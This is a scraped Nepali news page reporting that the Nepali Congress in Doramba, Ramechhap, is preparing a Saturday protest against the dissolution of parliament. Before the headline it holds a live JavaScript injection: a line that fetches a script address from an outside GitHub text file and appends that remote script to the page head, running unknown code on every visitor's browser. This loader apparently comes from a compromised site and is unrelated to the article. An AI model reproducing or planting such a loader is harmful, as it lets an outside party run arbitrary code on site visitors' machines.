;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); दोरम्बमा शनिबार कांग्रेसले बृहत प्रर्दशन गर्दै – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • दोरम्बमा शनिबार कांग्रेसले बृहत प्रर्दशन गर्दै
देश/प्रदेश

दोरम्बमा शनिबार कांग्रेसले बृहत प्रर्दशन गर्दै

माघ ०१,

रामेछाप । नेपाली कांग्रेस रामेछापको दोरम्बा गाउँपालिकाले शनिबार बिरोध कार्यक्रम गर्ने भएको छ ।

काग्रेसको केन्द्रीय समितिको निर्णयअनुसार यही माघ ३ गते देशब्यापी नगर तथा गाउँपालिकामा गरिने विरोध सभामा दोरम्बा गाउँपालिकाले तयारी सुरु गरेको पार्टीका सचिव लाल बहादुर मगरले जानकारी दिए ।

उनका अनुसार तयारी अन्तिम चरणमा पुगेको बताए । संसद् बिघटन असंबैधानिक र अबैधानिक भएको भन्दै कांग्रेसले प्रर्दशन गर्न लागको हो  ।

फेसबुक प्रतिक्रियाहरु